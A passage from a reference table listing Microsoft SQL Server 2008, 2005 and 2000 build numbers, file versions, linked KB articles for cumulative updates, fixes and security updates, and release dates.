| 10.0.1787 | 2007.100.1787.0 | [960484 Cumulative update package 3 (CU3) for SQL Server 2008](http://support.microsoft.com/kb/960484) | 2009-01-19 |
| 10.0.1779 | 2007.100.1779.0 | [958186 Cumulative update package 2 (CU2) for SQL Server 2008](http://support.microsoft.com/kb/958186) | 2008-11-19 |
| 10.0.1771 | 2007.100.1771.0 | [958611 FIX: You may receive incorrect results when you run a query that references three or more tables in the FROM clause in SQL Server 2008](http://support.microsoft.com/kb/958611) | 2008-10-29 |
| 10.0.1763 | 2007.100.1763.0 | [956717 Cumulative update package 1 (CU1) for SQL Server 2008](http://support.microsoft.com/kb/956717) | 2008-10-28 |
| 10.0.1750 | 2007.100.1750.0 | [956718 FIX: A MERGE statement may not enforce a foreign key constraint when the statement updates a unique key column that is not part of a clustering key that has a single row as the update source in SQL Server 2008](http://support.microsoft.com/kb/956718) | 2008-08-25 |
| 10.0.1600 | 2007.100.1600.22 | [SQL Server 2008 RTM](http://msdn.microsoft.com/en-us/subscriptions/downloads/details/default.aspx?pm=pid%3a334) | 2008-08-07 |
| 10.0.1442 | 2007.100.1442.32 | Microsoft SQL Server 2008 RC0 | 2008-06-05 |
| 10.0.1300 | 2007.100.1300.13 | Microsoft SQL Server 2008 CTP, February 2008 | 2008-02-19 |
| 10.0.1075 | 2007.100.1075.23 | Microsoft SQL Server 2008 CTP, November 2007 | 2007-11-18 |
| 10.0.1049 | 2007.100.1049.14 | SQL Server 2008 CTP, July 2007 | 2007-07-31 |
| 10.0.1019 | 2007.100.1019.17 | SQL Server 2008 CTP, June 2007 | 2007-05-21 |
Microsoft SQL Server 2005 Builds
--------------------------------
| Build | File version | KB / Description | Release Date |
| --- | --- | --- | --- |
| 9.00.5324 | 2005.90.5324.0 | [2716427 MS12-070: Description of the security update for SQL Server 2005 Service Pack 4 QFE](http://support.microsoft.com/kb/2716427) | 2012-10-09 |
| 9.00.5296 | 2005.90.5296.0 | [2615425 FIX: "Msg 7359" error when a view uses another view in SQL Server 2005 if the schema version of a remote table is updated](http://support.microsoft.com/kb/2615425) | 2011-10-24 |
| 9.00.5295 | 2005.90.5295.0 | [2598903 FIX: SQL Server Agent job randomly stops when you schedule the job to run past midnight on specific days in SQL Server 2005, in SQL Server 2008 or in SQL Server 2008 R2](http://support.microsoft.com/kb/2598903) | 2012-05-21 |
| 9.00.5294 | 2005.90.5294.0 | [2572407 FIX: Error 5180 when you use the ONLINE option to rebuild an index in SQL Server 2005](http://support.microsoft.com/kb/2572407) | 2011-08-10 |
| 9.00.5292 | 2005.90.5292.0 | [2494123 MS11-049: Description of the security update for SQL Server 2005 Service Pack 4 QFE: June 14, 2011](http://support.microsoft.com/kb/2494123) | 2011-06-14 |
| 9.00.5266 | 2005.90.5266.0 | [2507769 Cumulative update package 3 (CU3) for SQL Server 2005 Service Pack 4](http://support.microsoft.com/kb/2507769) | 2011-03-22 |
| 9.00.5259 | 2005.90.5259.0 | [2489409 Cumulative update package 2 (CU2) for SQL Server 2005 Service Pack 4](http://support.microsoft.com/kb/2489409) | 2011-02-22 |
| 9.00.5254 | 2005.90.5254.0 | [2464079 Cumulative update package 1 (CU1) for SQL Server 2005 Service Pack 4](http://support.microsoft.com/kb/2464079) | 2010-12-24 |
| 9.00.5069 | 2005.90.5069.0 | [Microsoft Security Bulletin MS12-070](http://technet.microsoft.com/en-us/security/bulletin/ms12-070) | 2012-10-09 |
| 9.00.5057 | 2005.90.5057.0 | [2494120 MS11-049: Description of the security update for SQL Server 2005 Service Pack 4 GDR: June 14, 2011](http://support.microsoft.com/kb/2494120) | 2011-06-14 |
| 9.00.5000 | 2005.90.5000.0 | SQL Server 2005 Service Pack 4 (SP4) | 2010-12-17 |
| 9.00.4912 | 2005.90.4912.0 | SQL Server 2005 Service Pack 4 (SP4) — Customer Technology Preview (CTP) | 2010-11-03 |
| 9.00.4342 | 2005.90.4342.0 | [2598903 FIX: SQL Server Agent job randomly stops when you schedule the job to run past midnight on specific days in SQL Server 2005, in SQL Server 2008 or in SQL Server 2008 R2](http://support.microsoft.com/kb/2598903) | 2012-05-21 |
| 9.00.4340 | 2005.90.4340.0 | [2494112 MS11-049: Description of the security update for SQL Server 2005 Service Pack 3 QFE: June 14, 2011](http://support.microsoft.com/kb/2494112) | 2011-06-14 |
| 9.00.4325 | 2005.90.4325.0 | [2507766 Cumulative update package 15 (CU15) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/2507766) | 2011-03-22 |
| 9.00.4317 | 2005.90.4317.0 | [2489375 Cumulative update package 14 (CU14) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/2489375) | 2011-02-21 |
| 9.00.4315 | 2005.90.4315.0 | [2438344 Cumulative update package 13 (CU13) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/2438344) | 2010-12-23 |
| 9.00.4311 | 2005.90.4311.0 | [2345449 Cumulative update package 12 (CU12) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/2345449) | 2010-10-18 |
| 9.00.4309 | 2005.90.4309.0 | [2258854 Cumulative update package 11 (CU11) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/2258854) | 2010-08-16 |
| 9.00.4305 | 2005.90.4305.0 | [983329 Cumulative update package 10 (CU10) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/983329) | 2010-06-23 |
| 9.00.4294 | 2005.90.4294.0 | [980176 Cumulative update package 9 (CU9) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/980176) | 2010-04-19 |
| 9.00.4285 | 2005.90.4285.0 | [978915 Cumulative update package 8 (CU8) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/978915) | 2010-02-16 |
| 9.00.4273 | 2005.90.4273.0 | [976951 Cumulative update package 7 (CU7) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/976951) | 2009-12-21 |
| 9.00.4268 | 2005.90.4268.0 | [977151 FIX: Error message when you add a subscription to a republisher that is in a merge publication in SQL Server 2005: "Cannot create the subscription because the subscription already exists in the subscription database"](http://support.microsoft.com/kb/977151) | 2009-12-21 |
| 9.00.4266 | 2005.90.4266.0 | [974648 Cumulative update package 6 (CU6) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/974648) | 2009-10-19 |
| 9.00.4262 | 2005.90.4262.0 | [970894 MS09-062: Description of the security update for SQL Server 2005 Service Pack 3 QFE: October 13, 2009](http://support.microsoft.com/kb/970894) | 2009-10-13 |
| 9.00.4230 | 2005.90.4230.0 | [972511 Cumulative update package 5 (CU5) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/972511) | 2009-08-17 |
| 9.00.4226 | 2005.90.4226.0 | [970279 Cumulative update package 4 (CU4) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/970279) | 2009-06-16 |
| 9.00.4224 | 2005.90.4224.0 | [971409 FIX: Error message when you run a query that contains duplicate join conditions in SQL Server 2005: "Internal Query Processor Error: The query processor could not produce a query plan"](http://support.microsoft.com/kb/971409) | 2009-06-16 |
| 9.00.4220 | 2005.90.4220.0 | [967909 Cumulative update package 3 (CU3) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/967909) | 2009-04-20 |
| 9.00.4216 | 2005.90.4216.0 | [967101 FIX: The performance of database mirroring decreases when you run a database maintenance job that generates a large number of transaction log activities in SQL Server 2005](http://support.microsoft.com/kb/967101) | 2009-04-20 |
| 9.00.4211 | 2005.90.4211.0 | [961930 Cumulative update package 2 (CU2) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/961930) | 2009-02-17 |
| 9.00.4207 | 2005.90.4207.0 | [959195 Cumulative update package 1 (CU1) for SQL Server 2005 Service Pack 3](http://support.microsoft.com/kb/959195) | 2008-12-20 |
| 9.00.4060 | 2005.90.4060.0 | [2494113 MS11-049: Description of the security update for SQL Server 2005 Service Pack 3 GDR: June 14, 2011](http://support.microsoft.com/kb/2494113) | 2011-06-14 |
| 9.00.4053 | 2005.90.4053.0 | [970892 MS09-062: Description of the security update for SQL Server 2005 Service Pack 3 GDR: October 13, 2009](http://support.microsoft.com/kb/970892/) | 2009-10-13 |
| 9.00.4035 | 2005.90.4035.0 | [SQL Server 2005 Service Pack 3 (SP3)](http://www.microsoft.com/downloads/details.aspx?FamilyId=AE7387C3-348C-4FAA-8AE5-949FDFBE59C4) | 2008-12-15 |
| 9.00.4028 | 2005.90.4028.0 | SQL Server 2005 Service Pack 3 (SP3) — CTP | 2008-10-27 |
| 9.00.3356 | 2005.90.3356.0 | [976952 Cumulative update package 17 (CU17) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/976952) | 2009-12-21 |
| 9.00.3355 | 2005.90.3355.0 | [974647 Cumulative update package 16 (CU16) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/974647) | 2009-10-19 |
| 9.00.3353 | 2005.90.3353.0 | [970896 MS09-062: Description of the security update for SQL Server 2005 Service Pack 2 QFE: October 13, 2009](http://support.microsoft.com/kb/970896) | 2009-10-13 |
| 9.00.3330 | 2005.90.3330.0 | [972510 Cumulative update package 15 (CU15) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/972510) | 2009-08-18 |
| 9.00.3328 | 2005.90.3328.0 | [970278 Cumulative update package 14 (CU14) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/970278) | 2009-06-16 |
| 9.00.3325 | 2005.90.3325.0 | [967908 Cumulative update package 13 (CU13) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/967908) | 2009-04-20 |
| 9.00.3320 | 2005.90.3320.0 | [969142 FIX: Error message when you run the DBCC CHECKDB statement on a database in SQL Server 2005: "Unable to deallocate a kept page"](http://support.microsoft.com/kb/969142) | 2009-04-01 |
| 9.00.3318 | 2005.90.3318.0 | [967199 FIX: The Wmiprvse.exe host process stops responding when you run a SQL Server 2005-based application that sends a Windows Management Instrumentation (WMI) query to the SQL Server WMI provider](http://support.microsoft.com/kb/967199) | 2009-04-20 |
| 9.00.3315 | 2005.90.3315.0 | [962970 Cumulative update package 12 (CU12) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/962970) | 2009-02-17 |
| 9.00.3310 | 2005.90.3310.0 | [960090 MS09-004: Description of the security update for SQL Server 2005 QFE: February 10, 2009](http://support.microsoft.com/kb/960090) | 2009-02-10 |
| 9.00.3301 | 2005.90.3301.0 | [958735 Cumulative update package 11 (CU11) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/958735) | 2008-12-16 |
| 9.00.3294 | 2005.90.3294.0 | [956854 Cumulative update package 10 (CU10) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/956854) | 2008-10-20 |
| 9.00.3282 | 2005.90.3282.0 | [953752 Cumulative update package 9 (CU9) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/953752) | 2008-06-16 |
| 9.00.3260 | 2005.90.3260.0 | [954950 FIX: Error message when you run a distributed query in SQL Server 2005](http://support.microsoft.com/kb/954950) | 2008-07-14 |
| 9.00.3259 | 2005.90.3259.0 | [954831 FIX: In SQL Server 2005, the session that runs the TRUNCATE TABLE statement may stop responding, and you cannot end the session](http://support.microsoft.com/kb/954831) | 2008-08-14 |
| 9.00.3259 | 2005.90.3259.0 | [954669 FIX: An ongoing MS DTC transaction is orphaned in SQL Server 2005](http://support.microsoft.com/kb/954669) | 2008-07-14 |
| 9.00.3257 | 2005.90.3257.0 | [951217 Cumulative update package 8 (CU8) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/951217) | 2008-06-18 |
| 9.00.3246 | 2005.90.3246.0 | [952233 FIX: All the MDX queries that are running on an instance of SQL Server 2005 Analysis Services are canceled when you start or stop a SQL Server Profiler trace for the instance](http://support.microsoft.com/kb/952233) | 2008-05-23 |
| 9.00.3244 | 2005.90.3244.0 | [952330 FIX: The Replication Log Reader Agent may fail intermittently when a transactional replication synchronizes data in SQL Server 2005](http://support.microsoft.com/kb/952330) | 2008-06-03 |
| 9.00.3240 | 2005.90.3240.0 | [951204 FIX: An access violation occurs when you update a table through a view by using a cursor in SQL Server 2005](http://support.microsoft.com/kb/951204) | 2008-05-21 |
| 9.00.3239 | 2005.90.3239.0 | [949095 Cumulative update package 7 (CU7) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/949095) | 2008-04-17 |
| 9.00.3232 | 2005.90.3232.0 | [949959 FIX: Error message when you synchronize the data of a merge replication in SQL Server 2005: "The merge process is retrying a failed operation made to article 'ArticleName' — Reason: 'Invalid input parameter values. Check the status values for detail.'"](http://support.microsoft.com/kb/949959) | 2008-03-19 |
| 9.00.3231 | 2005.90.3231.0 | [949595 FIX: Error message when you run a query that uses a join condition in SQL Server 2005: "Non-yielding Scheduler"](http://support.microsoft.com/kb/949595) | 2008-03-18 |
| 9.00.3231 | 2005.90.3231.0 | [949687 FIX: Error message when you run a transaction from a remote server by using a linked server in SQL Server 2005: "This operation conflicts with another pending operation on this transaction"](http://support.microsoft.com/kb/949687) | 2008-03-14 |
| 9.00.3230 | 2005.90.3230.0 | [949199 FIX: Error message when you run queries on a database that has the SNAPSHOT isolation level enabled in SQL Server 2005: "Unable to deallocate a kept page"](http://support.microsoft.com/kb/949199) | 2008-03-07 |
| 9.00.3228 | 2005.90.3228.0 | [946608 Cumulative update package 6 (CU6) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/946608) | 2008-02-19 |
| 9.00.3224 | 2005.90.3224.0 | [947463 FIX: A stored procedure cannot finish its execution in SQL Server 2005](http://support.microsoft.com/kb/947463) | 2008-02-04 |
| 9.00.3221 | 2005.90.3221.0 | [942908 FIX: The change may be undone during the later synchronizations when you change an article on the subscriber in SQL Server 2005](http://support.microsoft.com/kb/942908) | 2008-01-31 |
| 9.00.3221 | 2005.90.3221.0 | [945443 FIX: A query takes longer to finish in SQL Server 2005 than in SQL Server 2000 when you open a fast forward-only cursor for the query](http://support.microsoft.com/kb/945443) | 2008-01-11 |
| 9.00.3221 | 2005.90.3221.0 | [945916 FIX: Error messages when you delete some records of a table in a transaction or when you update some records of a table in a transaction in SQL Server 2005: "Msg 9002," "Msg 3314," and "Msg 9001"](http://support.microsoft.com/kb/945916) | 2008-01-10 |
| 9.00.3221 | 2005.90.3221.0 | [945442 FIX: You cannot cancel the query execution immediately if you open a fast forward-only cursor for the query in SQL Server 2005](http://support.microsoft.com/kb/945442) | 2008-01-09 |
| 9.00.3215 | 2005.90.3215.0 | [943656 Cumulative update package 5 (CU5) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/943656) | 2007-12-18 |
| 9.00.3208 | 2005.90.3208.0 | [944902 FIX: A federated database server stops responding when you run parallel queries on a multiprocessor computer that uses NUMA architecture in SQL Server 2005](http://support.microsoft.com/kb/944902) | 2007-11-21 |
| 9.00.3206 | 2005.90.3206.0 | [944677 FIX: Conflicts are not logged when you use the Microsoft SQL Server Subscriber Always Wins Conflict Resolver for an article in a merge replication in Microsoft SQL Server 2005](http://support.microsoft.com/kb/944677) | 2007-12-11 |
| 9.00.3200 | 2005.90.3200.0 | [941450 Cumulative update package 4 (CU4) for SQL Server 2005 Service Pack 2](http://support.microsoft.com/kb/941450) | 2007-10-17 |
| 9.00.3194 | 2005.90.3194.0 | [940933 FIX: Some changes from subscribers who use SQL Server 2005 Compact Edition or Web synchronization are not uploaded to the publisher when you use the republishing model in a merge publication in Microsoft SQL Server 2005](http://support.microsoft.com/kb/940933) | 2007-09-24 |
| 9.00.3186 | 2005.90.3186.0 | [940943 FIX: The performance of a query that performs an insert operation or an update operation is much slower in SQL Server 2005 SP2 than in earlier versions of SQL Server 2005](http://support.microsoft.com/kb/940943) | 2007-08-29 |
| 9.00.3182 | 2005.90.3182.0 | [940128 FIX: You receive error 8623 when you run a complex query in SQL Server 2005](http://support.microsoft.com/kb/940128) | 2007-08-03 |
| 9.00.3179 | 2005.90.3179.0 | [938243 FIX: Error message when you run a full-text query against a catalog in SQL Server 2005: "The execution of a full-text query failed. The content index is corrupt."](http://support.microsoft.com/kb/938243) | 2007-07-30 |
| 9.00.3178 | 2005.90.3178.0 | [938086 FIX: A SQL Server Agent job fails when you run the SQL Server Agent job in the context of a proxy account in SQL Server 2005](http://support.microsoft.com/kb/938086) | 2007-08-22 |
| 9.00.3177 | 2005.90.3177.0 | [939285 FIX: Error message when you run a stored procedure that starts a transaction that contains a Transact-SQL statement in SQL Server 2005: "New request is not allowed to start because it should come with valid transaction descriptor"](http://support.microsoft.com/kb/939285) | 2007-08-22 |
| 9.00.3175 | 2005.90.3175.0 | [936534 FIX: Error message when the Distribution Agent tries to apply the snapshot to the subscriber in SQL Server 2005: "Must declare the scalar variable "@Variable""](http://support.microsoft.com/kb/936534) | 2007-08-20 |
| 9.00.3175 | 2005.90.3175.0 | [938671 FIX: The Distribution Agent may skip some rows when you configure a transactional replication that uses the "-SkipErrors" parameter in SQL Server 2005](http://support.microsoft.com/kb/938671) | 2007-08-01 |
| 9.00.3171 | 2005.90.3171.0 | [937745 FIX: You may receive error messages when you try to log in to an instance of SQL Server 2005 and SQL Server handles many concurrent connections](http://support.microsoft.com/kb/937745) | 2007-07-16 |
| 9.00.1541 | 2005.90.1541.0 | [917888 FIX: Error message when you use a server-side cursor to run a large complex query in SQL Server 2005: "Error: 8623, Severity: 16, State: 1 The query processor ran out of internal resources"](http://support.microsoft.com/kb/917888) | 2006-11-22 |
| 9.00.1541 | 2005.90.1541.0 | [917971 FIX: You may receive more than 100,000 page faults when you try to back up a SQL Server 2005 database that contains hundreds of files and file groups](http://support.microsoft.com/kb/917971) | 2006-11-22 |
| 9.00.1539 | 2005.90.1539.0 | [917738 FIX: SQL Server 2005 system performance may be slow when you use a keyset-driven cursor to execute a FETCH statement](http://support.microsoft.com/kb/917738) | 2006-08-11 |
| 9.00.1538 | 2005.90.1538.0 | [917824 FIX: The SQL Server 2005 SqlCommandBuilder.DeriveParameters method returns an exception when the input parameter is a XML parameter that has an associated XSD from an SQL schema](http://support.microsoft.com/kb/917824) | 2006-07-26 |
| 9.00.1536 | 2005.90.1536.0 | [917016 FIX: The monitor server does not monitor all primary servers and secondary servers when you configure log shipping in SQL Server 2005](http://support.microsoft.com/kb/917016) | 2006-07-26 |
| 9.00.1534 | 2005.90.1534.0 | [916706 FIX: When you run the "dbcc dbreindex" command or the "alter index" command, some transactions are not replicated to the subscribers in a transactional replication in SQL Server 2005](http://support.microsoft.com/kb/916706) | 2007-05-15 |
| 9.00.1533 | 2005.90.1533.0 | [916086 FIX: Errors may be generated in the tempdb database when you create and then drop many temporary tables in SQL Server 2005](http://support.microsoft.com/kb/916086) | 2006-07-26 |
| 9.00.1532 | 2005.90.1532.0 | [916046 FIX: Indexes may grow very large when you insert a row into a table and then update the same row in SQL Server 2005](http://support.microsoft.com/kb/916046) | 2007-01-09 |
| 9.00.1531 | 2005.90.1531.0 | [915918 FIX: The internal deadlock monitor may not detect a deadlock between two or more sessions in SQL Server 2005](http://support.microsoft.com/kb/915918) | 2006-07-26 |
| 9.00.1528 | 2005.90.1528.0 | [915309 FIX: When you start a merge agent, synchronization between the subscriber and the publisher takes a long time to be completed in SQL Server 2005](http://support.microsoft.com/kb/915309) | 2007-01-15 |
| 9.00.1528 | 2005.90.1528.0 | [915308 FIX: The CPU usage of the server reaches 100% when many DML activities occur in SQL Server 2005](http://support.microsoft.com/kb/915308) | 2007-01-04 |
| 9.00.1528 | 2005.90.1528.0 | [915307 FIX: You experience a slow uploading process if conflicts occur when many merge agents upload changes to the publishers at the same time in SQL Server 2005](http://support.microsoft.com/kb/915307) | 2007-01-11 |
| 9.00.1528 | 2005.90.1528.0 | [915306 FIX: The merge agent fails and a "permission denied" error message is logged when you synchronize a SQL Server 2005-based merge publication](http://support.microsoft.com/kb/915306) | 2007-01-08 |
| 9.00.1528 | 2005.90.1528.0 | [915112 FIX: Error message when an ADO.NET-connected application tries to reuse a connection from the connection pool in SQL Server 2005: "The request failed to run because the batch is aborted"](http://support.microsoft.com/kb/915112) | 2006-07-26 |
| 9.00.1519 | 2005.90.1519.0 | [913494 FIX: The merge agent does not use a specified custom user update to handle conflicting UPDATE statements in SQL Server 2005](http://support.microsoft.com/kb/913494) | 2007-01-20 |
| 9.00.1518 | 2005.90.1518.0 | [913941 FIX: A SQL Server login may have more permissions when you log on to an instance of SQL Server 2005](http://support.microsoft.com/kb/913941) | 2006-09-22 |
| 9.00.1518 | 2005.90.1518.0 | [912472 FIX: An incorrect result may appear in the subscribing database when you set database mirroring for a database and database failover occurs in SQL Server 2005](http://support.microsoft.com/kb/912472) | 2006-07-26 |
| 9.00.1518 | 2005.90.1518.0 | [913371 FIX: You may receive error messages when you use the sp\_cursoropen statement to open a cursor on a user-defined stored procedure in SQL Server 2005](http://support.microsoft.com/kb/913371) | 2006-07-26 |
| 9.00.1514 | 2005.90.1514.0 | [912471 FIX: The replication on the server does not work any longer when you manually fail over databases in SQL Server 2005](http://support.microsoft.com/kb/912471) | 2006-07-26 |
| 9.00.1503 | 2005.90.1503.0 | [911662 FIX: You may receive an access violation error message when you run a SELECT query in SQL Server 2005](http://support.microsoft.com/kb/911662) | 2006-07-26 |
| 9.00.1502 | 2005.90.1502.0 | [915793 FIX: You cannot restore the log backups on the mirror server after you remove database mirroring for the mirror database in SQL Server 2005](http://support.microsoft.com/kb/915793) | 2006-07-26 |
| 9.00.1500 | 2005.90.1500.0 | [910416 FIX: Error message when you run certain queries or certain stored procedures in SQL Server 2005: "A severe error occurred on the current command"](http://support.microsoft.com/kb/910416) | 2006-06-01 |
| 9.00.1406 | 2005.90.1406.0 | [932557 FIX: A script task or a script component may not run correctly when you run an SSIS package in SQL Server 2005 build 1399](http://support.microsoft.com/kb/932557) | 2007-07-11 |
| 9.00.1399 | 2005.90.1399.0 | SQL Server 2005 RTM | 2005-11-07 |
Microsoft SQL Server 2000 Builds
--------------------------------
| Build | File version | KB / Description | Release Date |
| --- | --- | --- | --- |
| 8.00.2305 | 2000.80.2305.0 | [983811 MS12-060: Description of the security update for SQL Server 2000 Service Pack 4 QFE: August 14, 2012](http://support.microsoft.com/kb/983811/) | 2012-08-14 |
| 8.00.2301 | 2000.80.2301.0 | [983809 MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 QFE: April 10, 2012](http://support.microsoft.com/kb/983809/) | 2012-04-10 |
| 8.00.2283 | 2000.80.2283.0 | [971524 FIX: An access violation occurs when you run a DELETE statement or an UPDATE statement in the Itanium-based versions of SQL Server 2000 after you install security update MS09-004](http://support.microsoft.com/kb/971524/) | 2009-06-15 |
| 8.00.2282 | 2000.80.2282.0 | [960083 MS09-004: Description of the security update for SQL Server 2000 QFE and for MSDE 2000: February 10, 2009](http://support.microsoft.com/kb/960083/) | 2009-02-10 |
| 8.00.2279 | 2000.80.2279.0 | [959678 FIX: When you run the SPSBackup.exe utility to back up a SQL Server 2000 database that is configured as a back-end database for a Windows SharePoint Services server, the backup operation fails](http://support.microsoft.com/kb/959678/) | 2009-04-08 |
| 8.00.2273 | 2000.80.2273.0 | [948111 MS08-040: Description of the security update for SQL Server 2000 QFE and MSDE 2000 July 8, 2008](http://support.microsoft.com/kb/948111/) | 2008-08-05 |
| 8.00.2271 | 2000.80.2271.0 | [946584 FIX: The SPACE function always returns one space in SQL Server 2000 if the SPACE function uses a collation that differs from the collation of the current database](http://support.microsoft.com/kb/946584/) | 2008-03-12 |
| 8.00.2265 | 2000.80.2265.0 | [944985 FIX: The data on the publisher does not match the data on the subscriber when you synchronize a SQL Server 2005 Mobile Edition subscriber with a SQL Server 2000 "merge replication" publisher](http://support.microsoft.com/kb/944985/) | 2007-12-19 |
| 8.00.2253 | 2000.80.2253.0 | [939317 FIX: The CPU utilization may suddenly increase to 100 percent when there are many connections to an instance of SQL Server 2000 on a computer that has multiple processors](http://support.microsoft.com/kb/939317/) | 2007-10-09 |
| 8.00.2249 | 2000.80.2249.0 | [936232 FIX: An access violation may occur when you try to log in to an instance of SQL Server 2000](http://support.microsoft.com/kb/936232/) | 2007-05-25 |
| 8.00.2248 | 2000.80.2248.0 | [935950 FIX: The foreign key that you created between two tables does not work after you run the CREATE INDEX statement in SQL Server 2000](http://support.microsoft.com/kb/935950/) | 2007-06-14 |
| 8.00.2246 | 2000.80.2246.0 | [935465 An updated version of Sqlvdi.dll is now available for SQL Server 2000](http://support.microsoft.com/kb/935465/) | 2007-06-18 |
| 8.00.2245 | 2000.80.2245.0 | [933573 FIX: You may receive an assertion or database corruption may occur when you use the bcp utility or the "Bulk Insert" Transact-SQL command to import data in SQL Server 2000](http://support.microsoft.com/kb/933573/) | 2007-04-24 |
| 8.00.2244 | 2000.80.2244.0 | [934203 FIX: A hotfix for Microsoft SQL Server 2000 Service Pack 4 may not update all the necessary files on an x64-based computer](http://support.microsoft.com/kb/934203/) | 2007-05-10 |
| 8.00.2242 | 2000.80.2242.0 | [929131 FIX: In SQL Server 2000, the synchronization process is slow, and the CPU usage is high on the computer that is configured as the Distributor](http://support.microsoft.com/kb/929131/) | 2007-03-28 |
| 8.00.2238 | 2000.80.2238.0 | [931932 FIX: The merge agent fails intermittently when you use merge replication that uses a custom resolver after you install SQL Server 2000 Service Pack 4](http://support.microsoft.com/kb/931932/) | 2007-02-21 |
| 8.00.2236 | 2000.80.2236.0 | [930484 FIX: CPU utilization may approach 100 percent on a computer that is running SQL Server 2000 after you run the BACKUP DATABASE statement or the BACKUP LOG statement](http://support.microsoft.com/kb/930484/) | 2007-02-02 |
| 8.00.2234 | 2000.80.2234.0 | [929440 FIX: Error messages when you try to update table rows or insert table rows into a table in SQL Server 2000: "644" or "2511"](http://support.microsoft.com/kb/929440/) | 2007-02-22 |
| 8.00.2232 | 2000.80.2232.0 | [928568 FIX: SQL Server 2000 stops responding when you cancel a query or when a query time-out occurs, and error messages are logged in the SQL Server error log file](http://support.microsoft.com/kb/928568/) | 2007-01-15 |
| 8.00.2231 | 2000.80.2231.0 | [928079 FIX: The Sqldumper.exe utility cannot generate a filtered SQL Server dump file when you use the Remote Desktop Connection service or Terminal Services to connect to a Windows 2000 Server-based computer in SQL Server 2000](http://support.microsoft.com/kb/928079/) | 2007-06-19 |
| 8.00.2229 | 2000.80.2229.0 | [927186 FIX: Error message when you create a merge replication for tables that have computed columns in SQL Server 2000 Service Pack 4: "The process could not log conflict information"](http://support.microsoft.com/kb/927186/) | 2007-07-24 |
| 8.00.2226 | 2000.80.2226.0 | [925684 FIX: You may experience one or more symptoms when you run a "CREATE INDEX" statement on an instance of SQL Server 2000](http://support.microsoft.com/kb/925684/) | 2006-11-20 |
| 8.00.2226 | 2000.80.2226.0 | [925732 FIX: You may receive inconsistent comparison results when you compare strings by using a width sensitive collation in SQL Server 2000](http://support.microsoft.com/kb/925732/) | 2006-11-13 |
| 8.00.2223 | 2000.80.2223.0 | [925419 FIX: The server stops responding, the performance is slow, and a time-out occurs in SQL Server 2000](http://support.microsoft.com/kb/925419/) | 2007-07-20 |
| 8.00.2223 | 2000.80.2223.0 | [925678 FIX: Error message when you schedule a Replication Merge Agent job to run after you install SQL Server 2000 Service Pack 4: "The process could not enumerate changes at the 'Subscriber'"](http://support.microsoft.com/kb/925678/) | 2006-10-31 |
| 8.00.2218 | 2000.80.2218.0 | [925297 FIX: The result may be sorted in the wrong order when you run a query that uses the ORDER BY clause to sort a column in a table in SQL Server 2000](http://support.microsoft.com/kb/925297/) | 2007-06-19 |
| 8.00.2217 | 2000.80.2217.0 | [924664 FIX: You cannot stop the SQL Server service, or many minidump files and many log files are generated in SQL Server 2000](http://support.microsoft.com/kb/924664/) | 2007-10-25 |
| 8.00.2215 | 2000.80.2215.0 | [923796 FIX: Data in a subscriber of a merge publication in SQL Server 2000 differs from the data in the publisher](http://support.microsoft.com/kb/923796/) | 2007-01-12 |
| 8.00.2215 | 2000.80.2215.0 | [924662 FIX: The query performance may be slow when you query data from a view in SQL Server 2000](http://support.microsoft.com/kb/924662/) | 2006-10-05 |
| 8.00.2215 | 2000.80.2215.0 | [923563 FIX: Error message when you configure an immediate updating transactional replication in SQL Server 2000: "Implicit conversion from datatype 'text' to 'nvarchar' is not allowed"](http://support.microsoft.com/kb/923563/) | 2006-10-30 |
| 8.00.2215 | 2000.80.2215.0 | [923327 FIX: You may receive an access violation error message when you import data by using the "Bulk Insert" command in SQL Server 2000](http://support.microsoft.com/kb/923327/) | 2006-12-28 |
| 8.00.2209 | 2000.80.2209.0 | [923797 The Knowledge Base (KB) Article You Requested Is Currently Not Available](http://support.microsoft.com/kb/923797/) | ??? |
| 8.00.2207 | 2000.80.2207.0 | [923344 FIX: A SQL Server 2000 session may be blocked for the whole time that a Snapshot Agent job runs](http://support.microsoft.com/kb/923344/) | 2006-08-28 |
| 8.00.2201 | 2000.80.2201.0 | [920930 FIX: Error message when you try to run a query on a linked server in SQL Server 2000](http://support.microsoft.com/kb/920930/) | 2006-08-21 |
| 8.00.2199 | 2000.80.2199.0 | [919221 FIX: SQL Server 2000 may take a long time to complete the synchronization phase when you create a merge publication](http://support.microsoft.com/kb/919221/) | 2006-07-26 |
| 8.00.2197 | 2000.80.2197.0 | [919133 FIX: Each query takes a long time to compile when you execute a single query or when you execute multiple concurrent queries in SQL Server 2000](http://support.microsoft.com/kb/919133/) | 2006-08-02 |
| 8.00.2197 | 2000.80.2197.0 | [919068 FIX: The query may return incorrect results, and the execution plan for the query may contain a "Table Spool" operator in SQL Server 2000](http://support.microsoft.com/kb/919068/) | 2006-08-08 |
| 8.00.2197 | 2000.80.2197.0 | [919399 FIX: A profiler trace in SQL Server 2000 may stop logging events unexpectedly, and you may receive the following error message: "Failed to read trace data"](http://support.microsoft.com/kb/919399/) | 2006-10-18 |
